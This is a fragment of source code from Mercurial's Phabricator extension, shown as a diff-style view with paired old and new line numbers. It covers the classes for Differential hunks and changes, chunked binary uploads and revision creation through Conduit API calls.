549 ctx.repo(), ctx.p1().node(), ctx.node(), None, opts=diffopts
551 ctx.repo(), ctx.p1().node(), ctx.node(), None, opts=diffopts
550 ):
552 ):
551 output.write(chunk)
553 output.write(chunk)
552 return output.getvalue()
554 return output.getvalue()
553
555
554
556
555 class DiffChangeType(object):
557 class DiffChangeType(object):
556 ADD = 1
558 ADD = 1
557 CHANGE = 2
559 CHANGE = 2
558 DELETE = 3
560 DELETE = 3
559 MOVE_AWAY = 4
561 MOVE_AWAY = 4
560 COPY_AWAY = 5
562 COPY_AWAY = 5
561 MOVE_HERE = 6
563 MOVE_HERE = 6
562 COPY_HERE = 7
564 COPY_HERE = 7
563 MULTICOPY = 8
565 MULTICOPY = 8
564
566
565
567
566 class DiffFileType(object):
568 class DiffFileType(object):
567 TEXT = 1
569 TEXT = 1
568 IMAGE = 2
570 IMAGE = 2
569 BINARY = 3
571 BINARY = 3
570
572
571
573
572 @attr.s
574 @attr.s
573 class phabhunk(dict):
575 class phabhunk(dict):
574 """Represents a Differential hunk, which is owned by a Differential change
576 """Represents a Differential hunk, which is owned by a Differential change
575 """
577 """
576
578
577 oldOffset = attr.ib(default=0) # camelcase-required
579 oldOffset = attr.ib(default=0) # camelcase-required
578 oldLength = attr.ib(default=0) # camelcase-required
580 oldLength = attr.ib(default=0) # camelcase-required
579 newOffset = attr.ib(default=0) # camelcase-required
581 newOffset = attr.ib(default=0) # camelcase-required
580 newLength = attr.ib(default=0) # camelcase-required
582 newLength = attr.ib(default=0) # camelcase-required
581 corpus = attr.ib(default='')
583 corpus = attr.ib(default='')
582 # These get added to the phabchange's equivalents
584 # These get added to the phabchange's equivalents
583 addLines = attr.ib(default=0) # camelcase-required
585 addLines = attr.ib(default=0) # camelcase-required
584 delLines = attr.ib(default=0) # camelcase-required
586 delLines = attr.ib(default=0) # camelcase-required
585
587
586
588
587 @attr.s
589 @attr.s
588 class phabchange(object):
590 class phabchange(object):
589 """Represents a Differential change, owns Differential hunks and owned by a
591 """Represents a Differential change, owns Differential hunks and owned by a
590 Differential diff. Each one represents one file in a diff.
592 Differential diff. Each one represents one file in a diff.
591 """
593 """
592
594
593 currentPath = attr.ib(default=None) # camelcase-required
595 currentPath = attr.ib(default=None) # camelcase-required
594 oldPath = attr.ib(default=None) # camelcase-required
596 oldPath = attr.ib(default=None) # camelcase-required
595 awayPaths = attr.ib(default=attr.Factory(list)) # camelcase-required
597 awayPaths = attr.ib(default=attr.Factory(list)) # camelcase-required
596 metadata = attr.ib(default=attr.Factory(dict))
598 metadata = attr.ib(default=attr.Factory(dict))
597 oldProperties = attr.ib(default=attr.Factory(dict)) # camelcase-required
599 oldProperties = attr.ib(default=attr.Factory(dict)) # camelcase-required
598 newProperties = attr.ib(default=attr.Factory(dict)) # camelcase-required
600 newProperties = attr.ib(default=attr.Factory(dict)) # camelcase-required
599 type = attr.ib(default=DiffChangeType.CHANGE)
601 type = attr.ib(default=DiffChangeType.CHANGE)
600 fileType = attr.ib(default=DiffFileType.TEXT) # camelcase-required
602 fileType = attr.ib(default=DiffFileType.TEXT) # camelcase-required
601 commitHash = attr.ib(default=None) # camelcase-required
603 commitHash = attr.ib(default=None) # camelcase-required
602 addLines = attr.ib(default=0) # camelcase-required
604 addLines = attr.ib(default=0) # camelcase-required
603 delLines = attr.ib(default=0) # camelcase-required
605 delLines = attr.ib(default=0) # camelcase-required
604 hunks = attr.ib(default=attr.Factory(list))
606 hunks = attr.ib(default=attr.Factory(list))
605
607
606 def copynewmetadatatoold(self):
608 def copynewmetadatatoold(self):
607 for key in list(self.metadata.keys()):
609 for key in list(self.metadata.keys()):
608 newkey = key.replace(b'new:', b'old:')
610 newkey = key.replace(b'new:', b'old:')
609 self.metadata[newkey] = self.metadata[key]
611 self.metadata[newkey] = self.metadata[key]
610
612
611 def addoldmode(self, value):
613 def addoldmode(self, value):
612 self.oldProperties[b'unix:filemode'] = value
614 self.oldProperties[b'unix:filemode'] = value
613
615
614 def addnewmode(self, value):
616 def addnewmode(self, value):
615 self.newProperties[b'unix:filemode'] = value
617 self.newProperties[b'unix:filemode'] = value
616
618
617 def addhunk(self, hunk):
619 def addhunk(self, hunk):
618 if not isinstance(hunk, phabhunk):
620 if not isinstance(hunk, phabhunk):
619 raise error.Abort(b'phabchange.addhunk only takes phabhunks')
621 raise error.Abort(b'phabchange.addhunk only takes phabhunks')
620 self.hunks.append(pycompat.byteskwargs(attr.asdict(hunk)))
622 self.hunks.append(pycompat.byteskwargs(attr.asdict(hunk)))
621 # It's useful to include these stats since the Phab web UI shows them,
623 # It's useful to include these stats since the Phab web UI shows them,
622 # and uses them to estimate how large a change a Revision is. Also used
624 # and uses them to estimate how large a change a Revision is. Also used
623 # in email subjects for the [+++--] bit.
625 # in email subjects for the [+++--] bit.
624 self.addLines += hunk.addLines
626 self.addLines += hunk.addLines
625 self.delLines += hunk.delLines
627 self.delLines += hunk.delLines
626
628
627
629
628 @attr.s
630 @attr.s
629 class phabdiff(object):
631 class phabdiff(object):
630 """Represents a Differential diff, owns Differential changes. Corresponds
632 """Represents a Differential diff, owns Differential changes. Corresponds
631 to a commit.
633 to a commit.
632 """
634 """
633
635
634 # Doesn't seem to be any reason to send this (output of uname -n)
636 # Doesn't seem to be any reason to send this (output of uname -n)
635 sourceMachine = attr.ib(default=b'') # camelcase-required
637 sourceMachine = attr.ib(default=b'') # camelcase-required
636 sourcePath = attr.ib(default=b'/') # camelcase-required
638 sourcePath = attr.ib(default=b'/') # camelcase-required
637 sourceControlBaseRevision = attr.ib(default=b'0' * 40) # camelcase-required
639 sourceControlBaseRevision = attr.ib(default=b'0' * 40) # camelcase-required
638 sourceControlPath = attr.ib(default=b'/') # camelcase-required
640 sourceControlPath = attr.ib(default=b'/') # camelcase-required
639 sourceControlSystem = attr.ib(default=b'hg') # camelcase-required
641 sourceControlSystem = attr.ib(default=b'hg') # camelcase-required
640 branch = attr.ib(default=b'default')
642 branch = attr.ib(default=b'default')
641 bookmark = attr.ib(default=None)
643 bookmark = attr.ib(default=None)
642 creationMethod = attr.ib(default=b'phabsend') # camelcase-required
644 creationMethod = attr.ib(default=b'phabsend') # camelcase-required
643 lintStatus = attr.ib(default=b'none') # camelcase-required
645 lintStatus = attr.ib(default=b'none') # camelcase-required
644 unitStatus = attr.ib(default=b'none') # camelcase-required
646 unitStatus = attr.ib(default=b'none') # camelcase-required
645 changes = attr.ib(default=attr.Factory(dict))
647 changes = attr.ib(default=attr.Factory(dict))
646 repositoryPHID = attr.ib(default=None) # camelcase-required
648 repositoryPHID = attr.ib(default=None) # camelcase-required
647
649
648 def addchange(self, change):
650 def addchange(self, change):
649 if not isinstance(change, phabchange):
651 if not isinstance(change, phabchange):
650 raise error.Abort(b'phabdiff.addchange only takes phabchanges')
652 raise error.Abort(b'phabdiff.addchange only takes phabchanges')
651 self.changes[change.currentPath] = pycompat.byteskwargs(
653 self.changes[change.currentPath] = pycompat.byteskwargs(
652 attr.asdict(change)
654 attr.asdict(change)
653 )
655 )
654
656
655
657
656 def maketext(pchange, ctx, fname):
658 def maketext(pchange, ctx, fname):
657 """populate the phabchange for a text file"""
659 """populate the phabchange for a text file"""
658 repo = ctx.repo()
660 repo = ctx.repo()
659 fmatcher = match.exact([fname])
661 fmatcher = match.exact([fname])
660 diffopts = mdiff.diffopts(git=True, context=32767)
662 diffopts = mdiff.diffopts(git=True, context=32767)
661 _pfctx, _fctx, header, fhunks = next(
663 _pfctx, _fctx, header, fhunks = next(
662 patch.diffhunks(repo, ctx.p1(), ctx, fmatcher, opts=diffopts)
664 patch.diffhunks(repo, ctx.p1(), ctx, fmatcher, opts=diffopts)
663 )
665 )
664
666
665 for fhunk in fhunks:
667 for fhunk in fhunks:
666 (oldOffset, oldLength, newOffset, newLength), lines = fhunk
668 (oldOffset, oldLength, newOffset, newLength), lines = fhunk
667 corpus = b''.join(lines[1:])
669 corpus = b''.join(lines[1:])
668 shunk = list(header)
670 shunk = list(header)
669 shunk.extend(lines)
671 shunk.extend(lines)
670 _mf, _mt, addLines, delLines, _hb = patch.diffstatsum(
672 _mf, _mt, addLines, delLines, _hb = patch.diffstatsum(
671 patch.diffstatdata(util.iterlines(shunk))
673 patch.diffstatdata(util.iterlines(shunk))
672 )
674 )
673 pchange.addhunk(
675 pchange.addhunk(
674 phabhunk(
676 phabhunk(
675 oldOffset,
677 oldOffset,
676 oldLength,
678 oldLength,
677 newOffset,
679 newOffset,
678 newLength,
680 newLength,
679 corpus,
681 corpus,
680 addLines,
682 addLines,
681 delLines,
683 delLines,
682 )
684 )
683 )
685 )
684
686
685
687
686 def uploadchunks(fctx, fphid):
688 def uploadchunks(fctx, fphid):
687 """upload large binary files as separate chunks.
689 """upload large binary files as separate chunks.
688 Phab requests chunking over 8MiB, and splits into 4MiB chunks
690 Phab requests chunking over 8MiB, and splits into 4MiB chunks
689 """
691 """
690 ui = fctx.repo().ui
692 ui = fctx.repo().ui
691 chunks = callconduit(ui, b'file.querychunks', {b'filePHID': fphid})
693 chunks = callconduit(ui, b'file.querychunks', {b'filePHID': fphid})
692 with ui.makeprogress(
694 with ui.makeprogress(
693 _(b'uploading file chunks'), unit=_(b'chunks'), total=len(chunks)
695 _(b'uploading file chunks'), unit=_(b'chunks'), total=len(chunks)
694 ) as progress:
696 ) as progress:
695 for chunk in chunks:
697 for chunk in chunks:
696 progress.increment()
698 progress.increment()
697 if chunk[b'complete']:
699 if chunk[b'complete']:
698 continue
700 continue
699 bstart = int(chunk[b'byteStart'])
701 bstart = int(chunk[b'byteStart'])
700 bend = int(chunk[b'byteEnd'])
702 bend = int(chunk[b'byteEnd'])
701 callconduit(
703 callconduit(
702 ui,
704 ui,
703 b'file.uploadchunk',
705 b'file.uploadchunk',
704 {
706 {
705 b'filePHID': fphid,
707 b'filePHID': fphid,
706 b'byteStart': bstart,
708 b'byteStart': bstart,
707 b'data': base64.b64encode(fctx.data()[bstart:bend]),
709 b'data': base64.b64encode(fctx.data()[bstart:bend]),
708 b'dataEncoding': b'base64',
710 b'dataEncoding': b'base64',
709 },
711 },
710 )
712 )
711
713
712
714
713 def uploadfile(fctx):
715 def uploadfile(fctx):
714 """upload binary files to Phabricator"""
716 """upload binary files to Phabricator"""
715 repo = fctx.repo()
717 repo = fctx.repo()
716 ui = repo.ui
718 ui = repo.ui
717 fname = fctx.path()
719 fname = fctx.path()
718 size = fctx.size()
720 size = fctx.size()
719 fhash = pycompat.bytestr(hashlib.sha256(fctx.data()).hexdigest())
721 fhash = pycompat.bytestr(hashlib.sha256(fctx.data()).hexdigest())
720
722
721 # an allocate call is required first to see if an upload is even required
723 # an allocate call is required first to see if an upload is even required
722 # (Phab might already have it) and to determine if chunking is needed
724 # (Phab might already have it) and to determine if chunking is needed
723 allocateparams = {
725 allocateparams = {
724 b'name': fname,
726 b'name': fname,
725 b'contentLength': size,
727 b'contentLength': size,
726 b'contentHash': fhash,
728 b'contentHash': fhash,
727 }
729 }
728 filealloc = callconduit(ui, b'file.allocate', allocateparams)
730 filealloc = callconduit(ui, b'file.allocate', allocateparams)
729 fphid = filealloc[b'filePHID']
731 fphid = filealloc[b'filePHID']
730
732
731 if filealloc[b'upload']:
733 if filealloc[b'upload']:
732 ui.write(_(b'uploading %s\n') % bytes(fctx))
734 ui.write(_(b'uploading %s\n') % bytes(fctx))
733 if not fphid:
735 if not fphid:
734 uploadparams = {
736 uploadparams = {
735 b'name': fname,
737 b'name': fname,
736 b'data_base64': base64.b64encode(fctx.data()),
738 b'data_base64': base64.b64encode(fctx.data()),
737 }
739 }
738 fphid = callconduit(ui, b'file.upload', uploadparams)
740 fphid = callconduit(ui, b'file.upload', uploadparams)
739 else:
741 else:
740 uploadchunks(fctx, fphid)
742 uploadchunks(fctx, fphid)
741 else:
743 else:
742 ui.debug(b'server already has %s\n' % bytes(fctx))
744 ui.debug(b'server already has %s\n' % bytes(fctx))
743
745
744 if not fphid:
746 if not fphid:
745 raise error.Abort(b'Upload of %s failed.' % bytes(fctx))
747 raise error.Abort(b'Upload of %s failed.' % bytes(fctx))
746
748
747 return fphid
749 return fphid
748
750
749
751
750 def addoldbinary(pchange, oldfctx, fctx):
752 def addoldbinary(pchange, oldfctx, fctx):
751 """add the metadata for the previous version of a binary file to the
753 """add the metadata for the previous version of a binary file to the
752 phabchange for the new version
754 phabchange for the new version
753
755
754 ``oldfctx`` is the previous version of the file; ``fctx`` is the new
756 ``oldfctx`` is the previous version of the file; ``fctx`` is the new
755 version of the file, or None if the file is being removed.
757 version of the file, or None if the file is being removed.
756 """
758 """
757 if not fctx or fctx.cmp(oldfctx):
759 if not fctx or fctx.cmp(oldfctx):
758 # Files differ, add the old one
760 # Files differ, add the old one
759 pchange.metadata[b'old:file:size'] = oldfctx.size()
761 pchange.metadata[b'old:file:size'] = oldfctx.size()
760 mimeguess, _enc = mimetypes.guess_type(
762 mimeguess, _enc = mimetypes.guess_type(
761 encoding.unifromlocal(oldfctx.path())
763 encoding.unifromlocal(oldfctx.path())
762 )
764 )
763 if mimeguess:
765 if mimeguess:
764 pchange.metadata[b'old:file:mime-type'] = pycompat.bytestr(
766 pchange.metadata[b'old:file:mime-type'] = pycompat.bytestr(
765 mimeguess
767 mimeguess
766 )
768 )
767 fphid = uploadfile(oldfctx)
769 fphid = uploadfile(oldfctx)
768 pchange.metadata[b'old:binary-phid'] = fphid
770 pchange.metadata[b'old:binary-phid'] = fphid
769 else:
771 else:
770 # If it's left as IMAGE/BINARY web UI might try to display it
772 # If it's left as IMAGE/BINARY web UI might try to display it
771 pchange.fileType = DiffFileType.TEXT
773 pchange.fileType = DiffFileType.TEXT
772 pchange.copynewmetadatatoold()
774 pchange.copynewmetadatatoold()
773
775
774
776
775 def makebinary(pchange, fctx):
777 def makebinary(pchange, fctx):
776 """populate the phabchange for a binary file"""
778 """populate the phabchange for a binary file"""
777 pchange.fileType = DiffFileType.BINARY
779 pchange.fileType = DiffFileType.BINARY
778 fphid = uploadfile(fctx)
780 fphid = uploadfile(fctx)
779 pchange.metadata[b'new:binary-phid'] = fphid
781 pchange.metadata[b'new:binary-phid'] = fphid
780 pchange.metadata[b'new:file:size'] = fctx.size()
782 pchange.metadata[b'new:file:size'] = fctx.size()
781 mimeguess, _enc = mimetypes.guess_type(encoding.unifromlocal(fctx.path()))
783 mimeguess, _enc = mimetypes.guess_type(encoding.unifromlocal(fctx.path()))
782 if mimeguess:
784 if mimeguess:
783 mimeguess = pycompat.bytestr(mimeguess)
785 mimeguess = pycompat.bytestr(mimeguess)
784 pchange.metadata[b'new:file:mime-type'] = mimeguess
786 pchange.metadata[b'new:file:mime-type'] = mimeguess
785 if mimeguess.startswith(b'image/'):
787 if mimeguess.startswith(b'image/'):
786 pchange.fileType = DiffFileType.IMAGE
788 pchange.fileType = DiffFileType.IMAGE
787
789
788
790
789 # Copied from mercurial/patch.py
791 # Copied from mercurial/patch.py
790 gitmode = {b'l': b'120000', b'x': b'100755', b'': b'100644'}
792 gitmode = {b'l': b'120000', b'x': b'100755', b'': b'100644'}
791
793
792
794
793 def notutf8(fctx):
795 def notutf8(fctx):
794 """detect non-UTF-8 text files since Phabricator requires them to be marked
796 """detect non-UTF-8 text files since Phabricator requires them to be marked
795 as binary
797 as binary
796 """
798 """
797 try:
799 try:
798 fctx.data().decode('utf-8')
800 fctx.data().decode('utf-8')
799 return False
801 return False
800 except UnicodeDecodeError:
802 except UnicodeDecodeError:
801 fctx.repo().ui.write(
803 fctx.repo().ui.write(
802 _(b'file %s detected as non-UTF-8, marked as binary\n')
804 _(b'file %s detected as non-UTF-8, marked as binary\n')
803 % fctx.path()
805 % fctx.path()
804 )
806 )
805 return True
807 return True
806
808
807
809
808 def addremoved(pdiff, ctx, removed):
810 def addremoved(pdiff, ctx, removed):
809 """add removed files to the phabdiff. Shouldn't include moves"""
811 """add removed files to the phabdiff. Shouldn't include moves"""
810 for fname in removed:
812 for fname in removed:
811 pchange = phabchange(
813 pchange = phabchange(
812 currentPath=fname, oldPath=fname, type=DiffChangeType.DELETE
814 currentPath=fname, oldPath=fname, type=DiffChangeType.DELETE
813 )
815 )
814 pchange.addoldmode(gitmode[ctx.p1()[fname].flags()])
816 pchange.addoldmode(gitmode[ctx.p1()[fname].flags()])
815 oldfctx = ctx.p1()[fname]
817 oldfctx = ctx.p1()[fname]
816 if not (oldfctx.isbinary() or notutf8(oldfctx)):
818 if not (oldfctx.isbinary() or notutf8(oldfctx)):
817 maketext(pchange, ctx, fname)
819 maketext(pchange, ctx, fname)
818
820
819 pdiff.addchange(pchange)
821 pdiff.addchange(pchange)
820
822
821
823
822 def addmodified(pdiff, ctx, modified):
824 def addmodified(pdiff, ctx, modified):
823 """add modified files to the phabdiff"""
825 """add modified files to the phabdiff"""
824 for fname in modified:
826 for fname in modified:
825 fctx = ctx[fname]
827 fctx = ctx[fname]
826 oldfctx = fctx.p1()
828 oldfctx = fctx.p1()
827 pchange = phabchange(currentPath=fname, oldPath=fname)
829 pchange = phabchange(currentPath=fname, oldPath=fname)
828 filemode = gitmode[ctx[fname].flags()]
830 filemode = gitmode[ctx[fname].flags()]
829 originalmode = gitmode[ctx.p1()[fname].flags()]
831 originalmode = gitmode[ctx.p1()[fname].flags()]
830 if filemode != originalmode:
832 if filemode != originalmode:
831 pchange.addoldmode(originalmode)
833 pchange.addoldmode(originalmode)
832 pchange.addnewmode(filemode)
834 pchange.addnewmode(filemode)
833
835
834 if (
836 if (
835 fctx.isbinary()
837 fctx.isbinary()
836 or notutf8(fctx)
838 or notutf8(fctx)
837 or oldfctx.isbinary()
839 or oldfctx.isbinary()
838 or notutf8(oldfctx)
840 or notutf8(oldfctx)
839 ):
841 ):
840 makebinary(pchange, fctx)
842 makebinary(pchange, fctx)
841 addoldbinary(pchange, fctx.p1(), fctx)
843 addoldbinary(pchange, fctx.p1(), fctx)
842 else:
844 else:
843 maketext(pchange, ctx, fname)
845 maketext(pchange, ctx, fname)
844
846
845 pdiff.addchange(pchange)
847 pdiff.addchange(pchange)
846
848
847
849
848 def addadded(pdiff, ctx, added, removed):
850 def addadded(pdiff, ctx, added, removed):
849 """add file adds to the phabdiff, both new files and copies/moves"""
851 """add file adds to the phabdiff, both new files and copies/moves"""
850 # Keep track of files that've been recorded as moved/copied, so if there are
852 # Keep track of files that've been recorded as moved/copied, so if there are
851 # additional copies we can mark them (moves get removed from removed)
853 # additional copies we can mark them (moves get removed from removed)
852 copiedchanges = {}
854 copiedchanges = {}
853 movedchanges = {}
855 movedchanges = {}
854 for fname in added:
856 for fname in added:
855 fctx = ctx[fname]
857 fctx = ctx[fname]
856 oldfctx = None
858 oldfctx = None
857 pchange = phabchange(currentPath=fname)
859 pchange = phabchange(currentPath=fname)
858
860
859 filemode = gitmode[ctx[fname].flags()]
861 filemode = gitmode[ctx[fname].flags()]
860 renamed = fctx.renamed()
862 renamed = fctx.renamed()
861
863
862 if renamed:
864 if renamed:
863 originalfname = renamed[0]
865 originalfname = renamed[0]
864 oldfctx = ctx.p1()[originalfname]
866 oldfctx = ctx.p1()[originalfname]
865 originalmode = gitmode[oldfctx.flags()]
867 originalmode = gitmode[oldfctx.flags()]
866 pchange.oldPath = originalfname
868 pchange.oldPath = originalfname
867
869
868 if originalfname in removed:
870 if originalfname in removed:
869 origpchange = phabchange(
871 origpchange = phabchange(
870 currentPath=originalfname,
872 currentPath=originalfname,
871 oldPath=originalfname,
873 oldPath=originalfname,
872 type=DiffChangeType.MOVE_AWAY,
874 type=DiffChangeType.MOVE_AWAY,
873 awayPaths=[fname],
875 awayPaths=[fname],
874 )
876 )
875 movedchanges[originalfname] = origpchange
877 movedchanges[originalfname] = origpchange
876 removed.remove(originalfname)
878 removed.remove(originalfname)
877 pchange.type = DiffChangeType.MOVE_HERE
879 pchange.type = DiffChangeType.MOVE_HERE
878 elif originalfname in movedchanges:
880 elif originalfname in movedchanges:
879 movedchanges[originalfname].type = DiffChangeType.MULTICOPY
881 movedchanges[originalfname].type = DiffChangeType.MULTICOPY
880 movedchanges[originalfname].awayPaths.append(fname)
882 movedchanges[originalfname].awayPaths.append(fname)
881 pchange.type = DiffChangeType.COPY_HERE
883 pchange.type = DiffChangeType.COPY_HERE
882 else: # pure copy
884 else: # pure copy
883 if originalfname not in copiedchanges:
885 if originalfname not in copiedchanges:
884 origpchange = phabchange(
886 origpchange = phabchange(
885 currentPath=originalfname, type=DiffChangeType.COPY_AWAY
887 currentPath=originalfname, type=DiffChangeType.COPY_AWAY
886 )
888 )
887 copiedchanges[originalfname] = origpchange
889 copiedchanges[originalfname] = origpchange
888 else:
890 else:
889 origpchange = copiedchanges[originalfname]
891 origpchange = copiedchanges[originalfname]
890 origpchange.awayPaths.append(fname)
892 origpchange.awayPaths.append(fname)
891 pchange.type = DiffChangeType.COPY_HERE
893 pchange.type = DiffChangeType.COPY_HERE
892
894
893 if filemode != originalmode:
895 if filemode != originalmode:
894 pchange.addoldmode(originalmode)
896 pchange.addoldmode(originalmode)
895 pchange.addnewmode(filemode)
897 pchange.addnewmode(filemode)
896 else: # Brand-new file
898 else: # Brand-new file
897 pchange.addnewmode(gitmode[fctx.flags()])
899 pchange.addnewmode(gitmode[fctx.flags()])
898 pchange.type = DiffChangeType.ADD
900 pchange.type = DiffChangeType.ADD
899
901
900 if (
902 if (
901 fctx.isbinary()
903 fctx.isbinary()
902 or notutf8(fctx)
904 or notutf8(fctx)
903 or (oldfctx and (oldfctx.isbinary() or notutf8(oldfctx)))
905 or (oldfctx and (oldfctx.isbinary() or notutf8(oldfctx)))
904 ):
906 ):
905 makebinary(pchange, fctx)
907 makebinary(pchange, fctx)
906 if renamed:
908 if renamed:
907 addoldbinary(pchange, oldfctx, fctx)
909 addoldbinary(pchange, oldfctx, fctx)
908 else:
910 else:
909 maketext(pchange, ctx, fname)
911 maketext(pchange, ctx, fname)
910
912
911 pdiff.addchange(pchange)
913 pdiff.addchange(pchange)
912
914
913 for _path, copiedchange in copiedchanges.items():
915 for _path, copiedchange in copiedchanges.items():
914 pdiff.addchange(copiedchange)
916 pdiff.addchange(copiedchange)
915 for _path, movedchange in movedchanges.items():
917 for _path, movedchange in movedchanges.items():
916 pdiff.addchange(movedchange)
918 pdiff.addchange(movedchange)
917
919
918
920
919 def creatediff(ctx):
921 def creatediff(ctx):
920 """create a Differential Diff"""
922 """create a Differential Diff"""
921 repo = ctx.repo()
923 repo = ctx.repo()
922 repophid = getrepophid(repo)
924 repophid = getrepophid(repo)
923 # Create a "Differential Diff" via "differential.creatediff" API
925 # Create a "Differential Diff" via "differential.creatediff" API
924 pdiff = phabdiff(
926 pdiff = phabdiff(
925 sourceControlBaseRevision=b'%s' % ctx.p1().hex(),
927 sourceControlBaseRevision=b'%s' % ctx.p1().hex(),
926 branch=b'%s' % ctx.branch(),
928 branch=b'%s' % ctx.branch(),
927 )
929 )
928 modified, added, removed, _d, _u, _i, _c = ctx.p1().status(ctx)
930 modified, added, removed, _d, _u, _i, _c = ctx.p1().status(ctx)
929 # addadded will remove moved files from removed, so addremoved won't get
931 # addadded will remove moved files from removed, so addremoved won't get
930 # them
932 # them
931 addadded(pdiff, ctx, added, removed)
933 addadded(pdiff, ctx, added, removed)
932 addmodified(pdiff, ctx, modified)
934 addmodified(pdiff, ctx, modified)
933 addremoved(pdiff, ctx, removed)
935 addremoved(pdiff, ctx, removed)
934 if repophid:
936 if repophid:
935 pdiff.repositoryPHID = repophid
937 pdiff.repositoryPHID = repophid
936 diff = callconduit(
938 diff = callconduit(
937 repo.ui,
939 repo.ui,
938 b'differential.creatediff',
940 b'differential.creatediff',
939 pycompat.byteskwargs(attr.asdict(pdiff)),
941 pycompat.byteskwargs(attr.asdict(pdiff)),
940 )
942 )
941 if not diff:
943 if not diff:
942 raise error.Abort(_(b'cannot create diff for %s') % ctx)
944 raise error.Abort(_(b'cannot create diff for %s') % ctx)
943 return diff
945 return diff
944
946
945
947
946 def writediffproperties(ctx, diff):
948 def writediffproperties(ctx, diff):
947 """write metadata to diff so patches could be applied losslessly"""
949 """write metadata to diff so patches could be applied losslessly"""
948 # creatediff returns with a diffid but query returns with an id
950 # creatediff returns with a diffid but query returns with an id
949 diffid = diff.get(b'diffid', diff.get(b'id'))
951 diffid = diff.get(b'diffid', diff.get(b'id'))
950 params = {
952 params = {
951 b'diff_id': diffid,
953 b'diff_id': diffid,
952 b'name': b'hg:meta',
954 b'name': b'hg:meta',
953 b'data': templatefilters.json(
955 b'data': templatefilters.json(
954 {
956 {
955 b'user': ctx.user(),
957 b'user': ctx.user(),
956 b'date': b'%d %d' % ctx.date(),
958 b'date': b'%d %d' % ctx.date(),
957 b'branch': ctx.branch(),
959 b'branch': ctx.branch(),
958 b'node': ctx.hex(),
960 b'node': ctx.hex(),
959 b'parent': ctx.p1().hex(),
961 b'parent': ctx.p1().hex(),
960 }
962 }
961 ),
963 ),
962 }
964 }
963 callconduit(ctx.repo().ui, b'differential.setdiffproperty', params)
965 callconduit(ctx.repo().ui, b'differential.setdiffproperty', params)
964
966
965 params = {
967 params = {
966 b'diff_id': diffid,
968 b'diff_id': diffid,
967 b'name': b'local:commits',
969 b'name': b'local:commits',
968 b'data': templatefilters.json(
970 b'data': templatefilters.json(
969 {
971 {
970 ctx.hex(): {
972 ctx.hex(): {
971 b'author': stringutil.person(ctx.user()),
973 b'author': stringutil.person(ctx.user()),
972 b'authorEmail': stringutil.email(ctx.user()),
974 b'authorEmail': stringutil.email(ctx.user()),
973 b'time': int(ctx.date()[0]),
975 b'time': int(ctx.date()[0]),
974 b'commit': ctx.hex(),
976 b'commit': ctx.hex(),
975 b'parents': [ctx.p1().hex()],
977 b'parents': [ctx.p1().hex()],
976 b'branch': ctx.branch(),
978 b'branch': ctx.branch(),
977 },
979 },
978 }
980 }
979 ),
981 ),
980 }
982 }
981 callconduit(ctx.repo().ui, b'differential.setdiffproperty', params)
983 callconduit(ctx.repo().ui, b'differential.setdiffproperty', params)
982
984
983
985
984 def createdifferentialrevision(
986 def createdifferentialrevision(
985 ctx,
987 ctx,
986 revid=None,
988 revid=None,
987 parentrevphid=None,
989 parentrevphid=None,
988 oldnode=None,
990 oldnode=None,
989 olddiff=None,
991 olddiff=None,
990 actions=None,
992 actions=None,
991 comment=None,
993 comment=None,
992 ):
994 ):
993 """create or update a Differential Revision
995 """create or update a Differential Revision
994
996
995 If revid is None, create a new Differential Revision, otherwise update
997 If revid is None, create a new Differential Revision, otherwise update
996 revid. If parentrevphid is not None, set it as a dependency.
998 revid. If parentrevphid is not None, set it as a dependency.
997
999
998 If oldnode is not None, check if the patch content (without commit message
1000 If oldnode is not None, check if the patch content (without commit message
999 and metadata) has changed before creating another diff.
1001 and metadata) has changed before creating another diff.
1000
1002
1001 If actions is not None, they will be appended to the transaction.
1003 If actions is not None, they will be appended to the transaction.
1002 """
1004 """
1003 repo = ctx.repo()
1005 repo = ctx.repo()
1004 if oldnode:
1006 if oldnode:
1005 diffopts = mdiff.diffopts(git=True, context=32767)
1007 diffopts = mdiff.diffopts(git=True, context=32767)
1006 oldctx = repo.unfiltered()[oldnode]
1008 oldctx = repo.unfiltered()[oldnode]
1007 neednewdiff = getdiff(ctx, diffopts) != getdiff(oldctx, diffopts)
1009 neednewdiff = getdiff(ctx, diffopts) != getdiff(oldctx, diffopts)
1008 else:
1010 else:
1009 neednewdiff = True
1011 neednewdiff = True
1010
1012
1011 transactions = []
1013 transactions = []
1012 if neednewdiff:
1014 if neednewdiff:
1013 diff = creatediff(ctx)
1015 diff = creatediff(ctx)
1014 transactions.append({b'type': b'update', b'value': diff[b'phid']})
1016 transactions.append({b'type': b'update', b'value': diff[b'phid']})
1015 if comment:
1017 if comment:
1016 transactions.append({b'type': b'comment', b'value': comment})
1018 transactions.append({b'type': b'comment', b'value': comment})
1017 else:
1019 else:
1018 # Even if we don't need to upload a new diff because the patch content
1020 # Even if we don't need to upload a new diff because the patch content
1019 # does not change. We might still need to update its metadata so
1021 # does not change. We might still need to update its metadata so
1020 # pushers could know the correct node metadata.
1022 # pushers could know the correct node metadata.
1021 assert olddiff
1023 assert olddiff
1022 diff = olddiff
1024 diff = olddiff
1023 writediffproperties(ctx, diff)
1025 writediffproperties(ctx, diff)
1024
1026
1025 # Set the parent Revision every time, so commit re-ordering is picked-up
1027 # Set the parent Revision every time, so commit re-ordering is picked-up
1026 if parentrevphid:
1028 if parentrevphid:
1027 transactions.append(
1029 transactions.append(
1028 {b'type': b'parents.set', b'value': [parentrevphid]}
1030 {b'type': b'parents.set', b'value': [parentrevphid]}
1029 )
1031 )
1030
1032
1031 if actions:
1033 if actions:
1032 transactions += actions
1034 transactions += actions
1033
1035
1034 # Parse commit message and update related fields.
1036 # Parse commit message and update related fields.
1035 desc = ctx.description()
1037 desc = ctx.description()
1036 info = callconduit(
1038 info = callconduit(
1037 repo.ui, b'differential.parsecommitmessage', {b'corpus': desc}
1039 repo.ui, b'differential.parsecommitmessage', {b'corpus': desc}
1038 )
1040 )
1039 for k, v in info[b'fields'].items():
1041 for k, v in info[b'fields'].items():
1040 if k in [b'title', b'summary', b'testPlan']:
1042 if k in [b'title', b'summary', b'testPlan']:
1041 transactions.append({b'type': k, b'value': v})
1043 transactions.append({b'type': k, b'value': v})
1042
1044
1043 params = {b'transactions': transactions}
1045 params = {b'transactions': transactions}
1044 if revid is not None:
1046 if revid is not None:
1045 # Update an existing Differential Revision
1047 # Update an existing Differential Revision
1046 params[b'objectIdentifier'] = revid
1048 params[b'objectIdentifier'] = revid
1047
1049
1048 revision = callconduit(repo.ui, b'differential.revision.edit', params)
1050 revision = callconduit(repo.ui, b'differential.revision.edit', params)
1049 if not revision:
1051 if not revision:
1050 raise error.Abort(_(b'cannot create revision for %s') % ctx)
